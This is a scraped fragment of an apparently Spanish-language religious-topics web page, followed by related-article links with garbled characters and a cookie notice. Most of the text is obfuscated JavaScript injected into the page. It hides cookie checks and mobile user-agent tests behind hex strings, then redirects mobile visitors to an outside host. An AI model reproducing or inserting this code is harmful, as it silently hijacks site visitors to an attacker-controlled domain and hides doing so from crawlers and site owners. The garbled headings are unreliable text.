4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Relacionados

A?Es una orden corA?nica la imitaciA?n y obediencia a un ai???sabio religiosoai????

martin lizzano

A?Inspira el terror de Robespierre al yihadismo?

José Ángel Hernández

Mapa del agua espiritual

Moámmer Al-Muháyir
Cargando....

Esta web usa cookies para mejorar tu experiencia de navegación. Asumimos que está de acuerdo con esto, pero puede optar salir si lo desea. Aceptar Leer más